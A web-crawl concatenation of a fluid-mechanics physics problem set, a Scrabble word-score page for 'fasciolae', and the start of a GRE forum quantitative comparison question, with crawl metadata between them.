h2 times the density of mercury, find the ratio of heights of the two liquids.\n\n##### 3\n\nA circular tube of uniform cross section is filled with two liquids of densities r1 and r2 such that each liquid occupies a quarter of volume of the tube.\nIf the line joining the interface of liquids makes an angle q with vertical, find the value of q.\n\n##### 4\n\nA solid hemisphere of radius R is made to just sink in a liquid of density r. Find\n(a) the vertical thrust on the curved surface,\n(b) the side thrust on the hemisphere,\n(c) the vertical thrust on the flat surface,\n(d) the total hydrostatic force acting on the hemisphere.\n\n##### 5\n\nThe vessel shown in figure has two section of areas of cross section A1, and A2.\nA liquid of density r fills both the section up to a height h in each. Neglect air pressure. Mark the correct options.\n\n##### 6\n\nA metallic block weighs 100 g in air, and weighs only 93.6 g when immersed in water. It is known that some copper is mixed with the gold. Find the amount of copper added. (density of gold is 19.3 g/cm3 and that of copper is 8.9 g/cm3)\n\n##### 7\n\nA piece of ice is floating in water. What will happen to the level of water when all ice melts? What will happen if the vessel is filled not with water but with liquid\na) denser than water\nb) lighter than water\n\n##### 8\n\nA cubical block of iron 5 cm on each side is floating on mercury in a vessel\na) What is the height of the block above mercury level?\nb) Water is poured into the vessel so that it just covers the iron block? What is the height of the water column?\nDensity of mercury = 13.6 gm/cm3, density of iron = 7.2 gm/cm3\n\n##### 9\n\nA block of wood is floating in water in a closed vessel as shown in the figure. The vessel is connected to an air pump. When more air is pushed into the vessel, the block of wood floats with ( neglect compressibility of water )\na) larger part in the water\nb) smaller part in the water\nc) same part in the water\nd) at some instant it will sink\n\n##### 10\n\nA uniform cylinder of density r and cross-sectional area A floats in equilibrium in two non-mixing liquids of densities r1 and r2 as shown in the figure. The length of the part of the cylinder in air is h and the lengths of the part of cylinder immersed in the liquid are h1 and h2 as shown in the figure.\n\n##### 11\n\nA boat floating in a water tank is carrying a large stone. If the stone is unloaded into water, what will happen to the water level?\n\n##### 12\n\nA rod of length 6m has mass 12 kg. If it is hinged at one end at a distance of 3m below the water surface. (Specific gravity of the material of the rod is 0.5). Find\na) the length of rod under water\nb) angle made by rod with the vertical\nc) What weight must attached to the other end of the rod so that 5m of the rod is submerged?\nd) Find the magnitude and direction of the force exerted by the hinge on the rod.\n\n##### 13\n\nA tension in a string holding a solid block below the surface of a liquid as in figure is T when the system is at rest.\nThen what will be the tension in the string if the system has upward acceleration a ?\n\n##### 14\n\nA U-tube contains two liquids of densities r1 and r2. The tube is now given an acceleration a in the horizontal direction and the height difference in the sections is as shown. What is the ratio r1:r2 ?\n\n##### 15\n\nA no uniform cylinder of mass m, length l and radius r is having its center of mass at a distance l/4 from the center and lying on the axis of the cylinder. The cylinder is kept in a liquid of uniform density r. The moment of inertia of the rod about the center of mass is I. The angular acceleration of the point A relative to point B just after the rod is released from the position as shown in figure.\n\n##### 16\n\nWater is emerging slowly and smoothly from a tap. Find the radius of cross-section of water as a function of depth h fallen from the tap.\n\n##### 17\n\nm is gently placed on the middle of the surface is depressed by a distance y. The surface tension of liquid is given by\n\n##### 18\n\nWater is filled in a vessel to a height h. A small orifice is made at the bottom of vessel. Find the speed of efflux with which water comes out from the orifice.\n(Area of cross-section of orifice is negligible as compared to the area of cross-section of the vessel)\n\n##### 19\n\nA vessel with a small orifice in its bottom is field with water and kerosene. Density of water is r1 and density of kerosene is r2 (r1 > r2). Find the velocity of water flow if the height of the water layer is h1 and that of the kerosene layer is h2.\nNeglect viscosity.\n\n##### 20\n\nA Venturi meter is used to measure the flow speed of a fluid in a pipe. The meter is connected between two sections of the pipe; The cross sectional area A of the entrance and exit of the meter matches the pipe?s cross-sectional area. Between the entrance the exit, the fluid flows from the pipe with speed v and then through a narrow region of cross-sectional area a with speed V. A manometer connects the wider portion of the meter to the narrower portion. The change in the fluid?s speed is accompanied by a pressure difference between the wider and narrower region, which causes a height difference h of the liquid in the two arms of the nanometer.\n\nFind the speed of flow?\n\n##### 21\n\nA pitot tube is mounted along the axis of a gas pipeline having cross-sectional area A. If the densities of the liquid and the gas are and respectively and the difference in the height of liquid columns in the two arms of the pitots tube is Dh, find the speed of gas flowing across the section of the pipe.\n\n##### 22\n\nA tube bent at right angle is lowered into a water stream, as shown in figure. The velocity of the steam relative to the tube is v The closed upper end of the tube situated at a height h0 from the water surface has a small orifice. Find the height h upto which the water jet will spurt.\n\n##### 23\n\nFigure shows a Siphon, which is a device for removing liquid from a container. The tube must initially be filled, but once this has been done, liquid will flow through the tube until the liquid surface in the container is in level with the lower end of the tube.\n\n##### 24\n\nFind the work that has to be done to squeeze all water from a horizontally placed cylinder of volume V through an orifice of cross-sectional area a during the time t by means of constant force acting on the piston. The cross-sectional area of the orifice is considerably less than the piston area and there are no resistive forces.\n\n##### 25\n\nTwo liquids are filled upto heights h1 and h2 behind a wall of width w.\nFind out\na) forces in part AB and BC\nb) point of application of total force\n\n(neglect atmospheric pressure)\n\n##### 26\n\nLength of a horizontal arm of a tube is L and ends of both the vertical arms are open to atmospheric pressure Po. A liquid of density is poured in the tube such that liquid just fills the horizontal part of the tube as shown in figure. Now one end of the open end is sealed and the tube is then rotated about a vertical axis passing through the other vertical arm with angular speed w. If the liquid rises to a height h in the sealed arm, find the pressure in the sealed tube during rotation.\n\n##### 27\n\nA wide cylindrical vessel of height H is filled with water and is placed on the ground. Find at what height h from the bottom of the vessel a small hole should be made in the vessel so that the water coming out of this hole strikes the ground at the maximum distance from the vessel. What is this maximum distance?\n\n##### 28\n\nA vessel filled with water is free to slide on a frictionless surface. A small hole is made at a depth h from the surface. What is force required to be applied on the vessel to keep it stationary immediately after the water starts leaking.\n\n##### 29\n\nThe tube shown is of uniform cross-section. Liquid flows through it at a constant speed in the direction shown by the arrows. The liquid exerts on the tube\n(a) a net force to the right\n(b) a net force to the left\n(c) a clockwise torque\n(d) an anticlockwise torque\n\n##### 30\n\nWater is flowing out of a tank through a tube bent at right angle. The radius of the tube is r and the length of its horizontal section is l The rate of water flow is Q. What is the moment of reaction forces of flowing water acting on the tubes wall, relative to the point O?\n\n##### 31\n\nThe side wall of a wide vertical cylindrical vessel of height h has a narrow vertical slit running all the way down to the bottom of the vessel. The width of the slit is = w. With the slit closed, the vessel is filled with water. What is the resultant force of reaction of the water flowing out of the vessel immediately after the slit is opened?\n\n##### 32\n\nA cylindrical vessel of height H and base area A is filled with water. The vessel has a small oriface of area a in the bottom. Find the time in which the vessel will be empty." ]
[ null, "https://www.facebook.com/tr", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9230198,"math_prob":0.9489683,"size":14066,"snap":"2021-04-2021-17","text_gpt3_token_len":3214,"char_repetition_ratio":0.17003271,"word_repetition_ratio":0.03912883,"special_character_ratio":0.22280677,"punctuation_ratio":0.070866145,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98861104,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-23T21:13:31Z\",\"WARC-Record-ID\":\"<urn:uuid:fb1ee492-e5d3-47b5-8839-caccef525a0c>\",\"Content-Length\":\"102995\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7f79c2a6-c45b-45d4-b105-a4c5ac42400c>\",\"WARC-Concurrent-To\":\"<urn:uuid:43d039cc-9971-428c-948c-340b85501449>\",\"WARC-IP-Address\":\"216.194.169.159\",\"WARC-Target-URI\":\"http://wel.nlytn.in/visual-physics/mechanics-&-matter/fluids.html\",\"WARC-Payload-Digest\":\"sha1:WKMGO7PGQDQRAEOA4YZ6EAMYTZUOEB5E\",\"WARC-Block-Digest\":\"sha1:YWB35RKZ2W4O5BFL3NIKYZKJLB7MKJIG\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703538431.77_warc_CC-MAIN-20210123191721-20210123221721-00588.warc.gz\"}"}
https://www.litscape.com/word_analysis/fasciolae
[ "# fasciolae in Scrabble®\n\nThe word fasciolae is playable in Scrabble®, no blanks required. Because it is longer than 7 letters, you would have to play off an existing word or do it in several moves.\n\nFASCIOLAE\n(153)\n\n## Seven Letter Word Alert: (5 words)\n\ncelosia, coalise, facials, faecals, fascial\n\nFASCIOLAE\n(153)\nFASCIOLAE\n(135)\nFASCIOLAE\n(102)\nFASCIOLAE\n(90)\nFASCIOLAE\n(60)\nFASCIOLAE\n(57)\nFASCIOLAE\n(56)\nFASCIOLAE\n(56)\nFASCIOLAE\n(56)\nFASCIOLAE\n(48)\nFASCIOLAE\n(45)\nFASCIOLAE\n(45)\nFASCIOLAE\n(45)\nFASCIOLAE\n(45)\nFASCIOLAE\n(40)\nFASCIOLAE\n(38)\nFASCIOLAE\n(38)\nFASCIOLAE\n(38)\nFASCIOLAE\n(36)\nFASCIOLAE\n(36)\nFASCIOLAE\n(34)\nFASCIOLAE\n(32)\nFASCIOLAE\n(32)\nFASCIOLAE\n(32)\nFASCIOLAE\n(32)\nFASCIOLAE\n(32)\nFASCIOLAE\n(32)\nFASCIOLAE\n(30)\nFASCIOLAE\n(30)\nFASCIOLAE\n(30)\nFASCIOLAE\n(30)\nFASCIOLAE\n(30)\nFASCIOLAE\n(28)\nFASCIOLAE\n(28)\nFASCIOLAE\n(28)\nFASCIOLAE\n(26)\nFASCIOLAE\n(22)\nFASCIOLAE\n(20)\nFASCIOLAE\n(20)\nFASCIOLAE\n(19)\nFASCIOLAE\n(18)\nFASCIOLAE\n(18)\nFASCIOLAE\n(18)\nFASCIOLAE\n(17)\nFASCIOLAE\n(17)\nFASCIOLAE\n(17)\n\nFASCIOLAE\n(153)\nFASCIOLAE\n(135)\nFASCIOLAE\n(102)\nFASCIAL\n(98 = 48 + 50)\nFAECALS\n(98 = 48 + 50)\nFAECALS\n(98 = 48 + 50)\nFASCIAL\n(98 = 48 + 50)\nFACIALS\n(98 = 48 + 50)\nFACIALS\n(98 = 48 + 50)\nFAECALS\n(95 = 45 + 50)\nFAECALS\n(95 = 45 + 50)\nFACIALS\n(95 = 45 + 50)\nFASCIAL\n(95 = 45 + 50)\nFASCIAL\n(95 = 45 + 50)\nFASCIOLAE\n(90)\nFASCIAL\n(89 = 39 + 50)\nFACIALS\n(89 = 39 + 50)\nFACIALS\n(89 = 39 + 50)\nFACIALS\n(89 = 39 + 50)\nFACIALS\n(89 = 39 + 50)\nFACIALS\n(89 = 39 + 50)\nFACIALS\n(89 = 39 + 50)\nFAECALS\n(89 = 39 + 50)\nFAECALS\n(89 = 39 + 50)\nFASCIAL\n(89 = 39 + 50)\nFASCIAL\n(89 = 39 + 50)\nFASCIAL\n(89 = 39 + 50)\nFAECALS\n(89 = 39 + 50)\nFAECALS\n(89 = 39 + 50)\nFAECALS\n(89 = 39 + 50)\nFASCIAL\n(89 = 39 + 50)\nFACIALS\n(88 = 38 + 50)\nCELOSIA\n(86 = 36 + 50)\nFACIALS\n(86 = 36 + 50)\nFACIALS\n(86 = 36 + 50)\nCOALISE\n(86 = 36 + 50)\nCOALISE\n(86 = 36 + 50)\nFASCIAL\n(86 = 36 + 50)\nCELOSIA\n(86 = 36 + 50)\nFAECALS\n(86 = 36 + 50)\nFAECALS\n(84 = 34 + 50)\nFASCIAL\n(84 = 34 + 50)\nFACIALS\n(82 = 32 + 50)\nFACIALS\n(82 = 32 + 50)\nFAECALS\n(82 = 32 + 50)\nFAECALS\n(82 = 32 + 50)\nFASCIAL\n(82 = 32 + 50)\nFASCIAL\n(82 = 32 + 50)\nCELOSIA\n(80 = 30 + 50)\nCELOSIA\n(80 = 30 + 50)\nCOALISE\n(80 = 30 + 50)\nCELOSIA\n(80 = 30 + 50)\nFACIALS\n(80 = 30 + 50)\nCOALISE\n(80 = 30 + 50)\nCOALISE\n(80 = 30 + 50)\nCELOSIA\n(80 = 30 + 50)\nCOALISE\n(80 = 30 + 50)\nCOALISE\n(80 = 30 + 50)\nCELOSIA\n(80 = 30 + 50)\nCOALISE\n(80 = 30 + 50)\nCELOSIA\n(80 = 30 + 50)\nCELOSIA\n(80 = 30 + 50)\nCOALISE\n(80 = 30 + 50)\nFASCIAL\n(78 = 28 + 50)\nFAECALS\n(78 = 28 + 50)\nFASCIAL\n(78 = 28 + 50)\nFAECALS\n(78 = 28 + 50)\nFACIALS\n(78 = 28 + 50)\nFACIALS\n(78 = 28 + 50)\nFASCIAL\n(78 = 28 + 50)\nFASCIAL\n(78 = 28 + 50)\nFAECALS\n(78 = 28 + 50)\nFACIALS\n(78 = 28 + 50)\nFAECALS\n(78 = 28 + 50)\nFASCIAL\n(78 = 28 + 50)\nFACIALS\n(78 = 28 + 50)\nFAECALS\n(78 = 28 + 50)\nCOALISE\n(77 = 27 + 50)\nCELOSIA\n(77 = 27 + 50)\nFACIALS\n(76 = 26 + 50)\nFASCIAL\n(76 = 26 + 50)\nCELOSIA\n(76 = 26 + 50)\nFACIALS\n(76 = 26 + 50)\nFAECALS\n(76 = 26 + 50)\nFACIALS\n(76 = 26 + 50)\nFASCIAL\n(76 = 26 + 50)\nFAECALS\n(76 = 26 + 50)\nFASCIAL\n(76 = 26 + 50)\nCOALISE\n(76 = 26 + 50)\nFAECALS\n(76 = 26 + 50)\nFAECALS\n(76 = 26 + 50)\nFASCIAL\n(76 = 26 + 50)\nFAECALS\n(76 = 26 + 50)\nFACIALS\n(76 = 26 + 50)\nFACIALS\n(76 = 26 + 50)\nFASCIAL\n(76 = 26 + 50)\nFASCIAL\n(76 = 26 + 50)\nFAECALS\n(76 = 26 + 50)\nFAECALS\n(74 = 24 + 50)\nFAECALS\n(74 = 24 + 50)\nFASCIAL\n(74 = 24 + 50)\nCOALISE\n(74 = 24 + 50)\nFAECALS\n(74 = 24 + 50)\nFAECALS\n(74 = 24 + 50)\nFASCIAL\n(74 = 24 + 50)\nFAECALS\n(74 = 24 + 50)\nCOALISE\n(74 = 24 + 50)\nFACIALS\n(74 = 24 + 50)\nFACIALS\n(74 = 24 + 50)\nFASCIAL\n(74 = 24 + 50)\nFACIALS\n(74 = 24 + 50)\nCELOSIA\n(74 = 24 + 50)\nFASCIAL\n(74 = 24 + 50)\nFACIALS\n(74 = 24 + 50)\nCELOSIA\n(74 = 24 + 50)\nFACIALS\n(74 = 24 + 50)\nFASCIAL\n(74 = 24 + 50)\nCELOSIA\n(72 = 22 + 50)\nFACIALS\n(72 = 22 + 50)\nCOALISE\n(72 = 22 + 50)\nCELOSIA\n(72 = 22 + 50)\nCOALISE\n(72 = 22 + 50)\nCOALISE\n(72 = 22 + 50)\nCOALISE\n(72 = 22 + 50)\nCELOSIA\n(72 = 22 + 50)\nCELOSIA\n(72 = 22 + 50)\nFAECALS\n(72 = 22 + 50)\nCELOSIA\n(72 = 22 + 50)\nFASCIAL\n(72 = 22 + 50)\nCOALISE\n(72 = 22 + 50)\nCELOSIA\n(70 = 20 + 50)\nCOALISE\n(70 = 20 + 50)\nCOALISE\n(70 = 20 + 50)\nCELOSIA\n(70 = 20 + 50)\nFACIALS\n(70 = 20 + 50)\nCELOSIA\n(70 = 20 + 50)\nCELOSIA\n(70 = 20 + 50)\nCELOSIA\n(70 = 20 + 50)\nCELOSIA\n(70 = 20 + 50)\nCOALISE\n(70 = 20 + 50)\nCOALISE\n(70 = 20 + 50)\nCOALISE\n(70 = 20 + 50)\nFACIALS\n(70 = 20 + 50)\nCOALISE\n(70 = 20 + 50)\nFAECALS\n(68 = 18 + 50)\nCELOSIA\n(68 = 18 + 50)\nFAECALS\n(68 = 18 + 50)\nCOALISE\n(68 = 18 + 50)\nCOALISE\n(68 = 18 + 50)\nFASCIAL\n(68 = 18 + 50)\nCELOSIA\n(68 = 18 + 50)\nCOALISE\n(68 = 18 + 50)\nCOALISE\n(68 = 18 + 50)\nCOALISE\n(68 = 18 + 50)\nCELOSIA\n(68 = 18 + 50)\nFAECALS\n(68 = 18 + 50)\nFASCIAL\n(68 = 18 + 50)\nCELOSIA\n(68 = 18 + 50)\nFACIALS\n(68 = 18 + 50)\nCELOSIA\n(68 = 18 + 50)\nFASCIAL\n(68 = 18 + 50)\nCELOSIA\n(67 = 17 + 50)\nCOALISE\n(67 = 17 + 50)\nFACIALS\n(67 = 17 + 50)\nFAECALS\n(67 = 17 + 50)\nFASCIAL\n(67 = 17 + 50)\nFASCIAL\n(66 = 16 + 50)\nFACIALS\n(66 = 16 + 50)\nFAECALS\n(66 = 16 + 50)\nFASCIAL\n(66 = 16 + 50)\nFASCIAL\n(66 = 16 + 50)\nFAECALS\n(66 = 16 + 50)\nFAECALS\n(66 = 16 + 50)\nFACIALS\n(66 = 16 + 50)\nFACIALS\n(66 = 16 + 50)\nFASCIAL\n(66 = 16 + 50)\nFAECALS\n(66 = 16 + 50)\nFAECALS\n(65 = 15 + 50)\nFASCIAL\n(65 = 15 + 50)\nCELOSIA\n(64 = 14 + 50)\nCELOSIA\n(64 = 14 + 50)\nFACIALS\n(64 = 14 + 50)\nFACIALS\n(64 = 14 + 50)\nFAECALS\n(64 = 14 + 50)\nCOALISE\n(64 = 14 + 50)\nFASCIAL\n(64 = 14 + 50)\nFACIALS\n(64 = 14 + 50)\nCOALISE\n(64 = 14 + 50)\nFASCIAL\n(64 = 14 + 50)\nFAECALS\n(64 = 14 + 50)\nFASCIAL\n(64 = 14 + 50)\nFACIALS\n(64 = 14 + 50)\nFAECALS\n(64 = 14 + 50)\nCELOSIA\n(63 = 13 + 50)\nCELOSIA\n(63 = 13 + 50)\nCOALISE\n(63 = 13 + 50)\nFACIALS\n(63 = 13 + 50)\nCELOSIA\n(63 = 13 + 50)\nCOALISE\n(63 = 13 + 50)\nCOALISE\n(63 = 13 + 50)\n\n# fasciolae in Words With Friends™\n\nThe word fasciolae is playable in Words With Friends™, no blanks required. Because it is longer than 7 letters, you would have to play off an existing word or do it in several moves.\n\nFASCIOLAE\n(234)\n\n## Seven Letter Word Alert: (5 words)\n\ncelosia, coalise, facials, faecals, fascial\n\nFASCIOLAE\n(234)\nFASCIOLAE\n(144)\nFASCIOLAE\n(108)\nFASCIOLAE\n(80)\nFASCIOLAE\n(78)\nFASCIOLAE\n(78)\nFASCIOLAE\n(68)\nFASCIOLAE\n(68)\nFASCIOLAE\n(68)\nFASCIOLAE\n(66)\nFASCIOLAE\n(66)\nFASCIOLAE\n(64)\nFASCIOLAE\n(64)\nFASCIOLAE\n(60)\nFASCIOLAE\n(60)\nFASCIOLAE\n(52)\nFASCIOLAE\n(52)\nFASCIOLAE\n(48)\nFASCIOLAE\n(40)\nFASCIOLAE\n(40)\nFASCIOLAE\n(36)\nFASCIOLAE\n(36)\nFASCIOLAE\n(36)\nFASCIOLAE\n(36)\nFASCIOLAE\n(36)\nFASCIOLAE\n(34)\nFASCIOLAE\n(32)\nFASCIOLAE\n(32)\nFASCIOLAE\n(32)\nFASCIOLAE\n(32)\nFASCIOLAE\n(32)\nFASCIOLAE\n(32)\nFASCIOLAE\n(26)\nFASCIOLAE\n(25)\nFASCIOLAE\n(24)\nFASCIOLAE\n(23)\nFASCIOLAE\n(23)\nFASCIOLAE\n(22)\nFASCIOLAE\n(22)\nFASCIOLAE\n(22)\nFASCIOLAE\n(21)\nFASCIOLAE\n(20)\nFASCIOLAE\n(20)\nFASCIOLAE\n(20)\nFASCIOLAE\n(19)\nFASCIOLAE\n(19)\nFASCIOLAE\n(19)\nFASCIOLAE\n(18)\nFASCIOLAE\n(18)\nFASCIOLAE\n(18)\nFASCIOLAE\n(18)\nFASCIOLAE\n(18)\nFASCIOLAE\n(17)\n\nFASCIOLAE\n(234)\nFASCIOLAE\n(144)\nFACIALS\n(125 = 90 + 35)\nFAECALS\n(113 = 78 + 35)\nFASCIOLAE\n(108)\nFASCIAL\n(107 = 72 + 35)\nFASCIAL\n(107 = 72 + 35)\nFAECALS\n(107 = 72 + 35)\nFASCIAL\n(107 = 72 + 35)\nFAECALS\n(107 = 72 + 35)\nCELOSIA\n(104 = 69 + 35)\nFAECALS\n(101 = 66 + 35)\nFASCIAL\n(101 = 66 + 35)\nFASCIAL\n(101 = 66 + 35)\nFACIALS\n(101 = 66 + 35)\nFASCIAL\n(101 = 66 + 35)\nFAECALS\n(101 = 66 + 35)\nFAECALS\n(101 = 66 + 35)\nCOALISE\n(98 = 63 + 35)\nFASCIAL\n(95 = 60 + 35)\nFACIALS\n(95 = 60 + 35)\nCOALISE\n(92 = 57 + 35)\nCELOSIA\n(92 = 57 + 35)\nFASCIAL\n(91 = 56 + 35)\nFAECALS\n(91 = 56 + 35)\nFAECALS\n(91 = 56 + 35)\nFACIALS\n(91 = 56 + 35)\nFASCIAL\n(91 = 56 + 35)\nFACIALS\n(91 = 56 + 35)\nFACIALS\n(91 = 56 + 35)\nFAECALS\n(91 = 56 + 35)\nFASCIAL\n(91 = 56 + 35)\nFACIALS\n(89 = 54 + 35)\nFAECALS\n(89 = 54 + 35)\nFACIALS\n(89 = 54 + 35)\nFAECALS\n(89 = 54 + 35)\nFACIALS\n(89 = 54 + 35)\nFASCIAL\n(89 = 54 + 35)\nFACIAL\n(87)\nCOALISE\n(86 = 51 + 35)\nCOALISE\n(86 = 51 + 35)\nFACIES\n(84)\nFASCIAL\n(83 = 48 + 35)\nFAECALS\n(83 = 48 + 35)\nFASCIAL\n(83 = 48 + 35)\nFACIALS\n(83 = 48 + 35)\nFACIALS\n(83 = 48 + 35)\nFACIALS\n(83 = 48 + 35)\nFAECALS\n(83 = 48 + 35)\nFACIALS\n(83 = 48 + 35)\nFASCIOLAE\n(80)\nCELOSIA\n(80 = 45 + 35)\nCELOSIA\n(80 = 45 + 35)\nCOALISE\n(80 = 45 + 35)\nCOALISE\n(80 = 45 + 35)\nCOALISE\n(80 = 45 + 35)\nCELOSIA\n(80 = 45 + 35)\nCOALISE\n(79 = 44 + 35)\nCELOSIA\n(79 = 44 + 35)\nFAECALS\n(79 = 44 + 35)\nCELOSIA\n(79 = 44 + 35)\nFACIALS\n(79 = 44 + 35)\nFACIALS\n(79 = 44 + 35)\nCOALISE\n(79 = 44 + 35)\nCELOSIA\n(79 = 44 + 35)\nCOALISE\n(79 = 44 + 35)\nFASCIAL\n(79 = 44 + 35)\nFASCIOLAE\n(78)\nFASCIOLAE\n(78)\nFISCAL\n(75)\nFELSIC\n(75)\nFAECAL\n(75)\nCALIFS\n(75)\nCELOSIA\n(74 = 39 + 35)\nCELOSIA\n(74 = 39 + 35)\nCELOSIA\n(74 = 39 + 35)\nCOALISE\n(74 = 39 + 35)\nCOALISE\n(74 = 39 + 35)\nCELOSIA\n(74 = 39 + 35)\nCELOSIA\n(74 = 39 + 35)\nCOALISE\n(74 = 39 + 35)\nCOALISE\n(73 = 38 + 35)\nCELOSIA\n(73 = 38 + 35)\nFACIALS\n(71 = 36 + 35)\nFAECALS\n(71 = 36 + 35)\nFASCIAL\n(71 = 36 + 35)\nFASCIAL\n(71 = 36 + 35)\nFACIALS\n(71 = 36 + 35)\nFAECALS\n(71 = 36 + 35)\nFACIALS\n(71 = 36 + 35)\nFAECAL\n(69)\nFELSIC\n(69)\nFISCAL\n(69)\nFASCIOLAE\n(68)\nFASCIOLAE\n(68)\nFASCIOLAE\n(68)\nFACIALS\n(67 = 32 + 35)\nFASCIAL\n(67 = 32 + 35)\nFAECALS\n(67 = 32 + 35)\nFACIALS\n(67 = 32 + 35)\nFACIALS\n(67 = 32 + 35)\nFASCIAL\n(67 = 32 + 35)\nFAECALS\n(67 = 32 + 35)\nFACIALS\n(67 = 32 + 35)\nFASCIAL\n(67 = 32 + 35)\nFAECALS\n(67 = 32 + 35)\nFAECALS\n(67 = 32 + 35)\nFAECALS\n(67 = 32 + 35)\nFASCIAL\n(67 = 32 + 35)\nFASCIAL\n(67 = 32 + 35)\nFASCIOLAE\n(66)\nFASCIOLAE\n(66)\nFIASCO\n(66)\nFASCIA\n(66)\nFASCIA\n(66)\nFAECALS\n(65 = 30 + 35)\nFASCIAL\n(65 = 30 + 35)\nCOALISE\n(65 = 30 + 35)\nFACIALS\n(65 = 30 + 35)\nCELOSIA\n(65 = 30 + 35)\nFAECALS\n(65 = 30 + 35)\nFACIALS\n(65 = 30 + 35)\nCELOSIA\n(65 = 30 + 35)\nFASCIAL\n(65 = 30 + 35)\nFAECALS\n(65 = 30 + 35)\nFASCIAL\n(65 = 30 + 35)\nFACIALS\n(65 = 30 + 35)\nFAECALS\n(65 = 30 + 35)\nFASCIAL\n(65 = 30 + 35)\nFASCIOLAE\n(64)\nFASCIOLAE\n(64)\nCALIFS\n(63)\nFAECALS\n(63 = 28 + 35)\nFELSIC\n(63)\nFAECALS\n(63 = 28 + 35)\nFASCIAL\n(63 = 28 + 35)\nFASCIAL\n(63 = 28 + 35)\nFASCIAL\n(63 = 28 + 35)\nFACIALS\n(63 = 28 + 35)\nFACIALS\n(63 = 28 + 35)\nFISCAL\n(63)\nFACIALS\n(63 = 28 + 35)\nFISCAL\n(63)\nFACIALS\n(63 = 28 + 35)\nFAECALS\n(63 = 28 + 35)\nFACIAL\n(63)\nFAECAL\n(63)\nFAECALS\n(63 = 28 + 35)\nFACIALS\n(63 = 28 + 35)\nFACIAL\n(63)\nFASCIAL\n(63 = 28 + 35)\nFASCIAL\n(63 = 28 + 35)\nFAECALS\n(63 = 28 + 35)\nFASCIAL\n(63 = 28 + 35)\nFACIALS\n(63 = 28 + 35)\nFACIALS\n(63 = 28 + 35)\nFASCIAL\n(63 = 28 + 35)\nFAECALS\n(63 = 28 + 35)\nFAECALS\n(63 = 28 + 35)\nFELSIC\n(63)\nFAECAL\n(63)\nCALIFS\n(63)\nCELOSIA\n(61 = 26 + 35)\nCOALISE\n(61 = 26 + 35)\nCELOSIA\n(61 = 26 + 35)\nCOALISE\n(61 = 26 + 35)\nCELOSIA\n(61 = 26 + 35)\nCELOSIA\n(61 = 26 + 35)\nCOALISE\n(61 = 26 + 35)\nCOALISE\n(61 = 26 + 35)\nCOALISE\n(61 = 26 + 35)\nCELOSIA\n(61 = 26 + 35)\nCALIF\n(60)\nCALIF\n(60)\nFASCIOLAE\n(60)\nFOLIC\n(60)\nFASCIOLAE\n(60)\nFOCAL\n(60)\nFOLIC\n(60)\nCALFS\n(60)\nFECAL\n(60)\nFASCIA\n(60)\nCLEFS\n(60)\nFACIES\n(60)\nSOCIAL\n(60)\nCLEFS\n(60)\nFACIES\n(60)\nFIASCO\n(60)\nFASCIA\n(60)\nFIASCO\n(60)\nCALFS\n(60)\nCELOSIA\n(59 = 24 + 35)\nFASCIAL\n(59 = 24 + 35)\nCELOSIA\n(59 = 24 + 35)\nCELOSIA\n(59 = 24 + 35)\nCELOSIA\n(59 = 24 + 35)\nFAECALS\n(59 = 24 + 35)\nCOALISE\n(59 = 24 + 35)\nCOALISE\n(59 = 24 + 35)\nFACIALS\n(59 = 24 + 35)\n\n# Word Growth involving fasciolae\n\nas fasciola\n\nfa fasciola\n\nla fasciola\n\n## Longer words containing fasciolae\n\n(No longer words found)" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89816093,"math_prob":1.0000093,"size":731,"snap":"2019-35-2019-39","text_gpt3_token_len":234,"char_repetition_ratio":0.2530949,"word_repetition_ratio":0.5794392,"special_character_ratio":0.19835842,"punctuation_ratio":0.13740458,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999676,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-18T09:19:42Z\",\"WARC-Record-ID\":\"<urn:uuid:eed37858-1f8c-434c-8ee0-b016b74fb8d9>\",\"Content-Length\":\"156996\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7768fa2b-06e3-453a-9b36-d1c2cd56d36b>\",\"WARC-Concurrent-To\":\"<urn:uuid:56be267f-d2b8-40db-915d-08555756fd93>\",\"WARC-IP-Address\":\"104.18.50.165\",\"WARC-Target-URI\":\"https://www.litscape.com/word_analysis/fasciolae\",\"WARC-Payload-Digest\":\"sha1:VHALPBKMXP5LBO3LO6KTNMFAL77PHYYD\",\"WARC-Block-Digest\":\"sha1:CSWIFKXZUX22DVNO6WOWQQVW3SI5R55R\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514573264.27_warc_CC-MAIN-20190918085827-20190918111827-00187.warc.gz\"}"}
https://greprepclub.com/forum/x-y-8260.html
[ "", null, "It is currently 22 Jul 2019, 08:22", null, "### GMAT Club Daily Prep\n\n#### Thank you for using the timer - this advanced tool can estimate your performance and suggest more practice questions. We have subscribed you to Daily Prep Questions via email.\n\nCustomized\nfor You\n\nwe will pick new questions that match your level based on your Timer History\n\nTrack\n\nevery week, we’ll send you an estimated GMAT score based on your performance\n\nPractice\nPays\n\nwe will pick new questions that match your level based on your Timer History\n\n#### Not interested in getting valuable practice questions and articles delivered to your email? No problem, unsubscribe here.", null, "# x < y - 2", null, "", null, "Question banks Downloads My Bookmarks Reviews Important topics\nAuthor Message\nTAGS:\nFounder", null, "", null, "Joined: 18 Apr 2015\nPosts: 7418\nFollowers: 125\n\nKudos [?]: 1454 , given: 6625\n\nx < y - 2 [#permalink]\nExpert's post", null, "00:00\n\nQuestion Stats:", null, "62% (00:37) correct", null, "37% (02:15) wrong", null, "based on 16 sessions\n$$x < y - 2$$\n\n Quantity A Quantity B The average (arithmetic mean) of x and y $$y-1$$\n\nA. Quantity A is greater.\nB. Quantity B is greater.\nC. The two quantities are equal\nD. The relationship cannot be determined from the information given.\n[Reveal] Spoiler: OA\n\n_________________", null, "GRE Instructor", null, "Joined: 10 Apr 2015\nPosts: 2175\nFollowers: 65\n\nKudos [?]: 1992 , given: 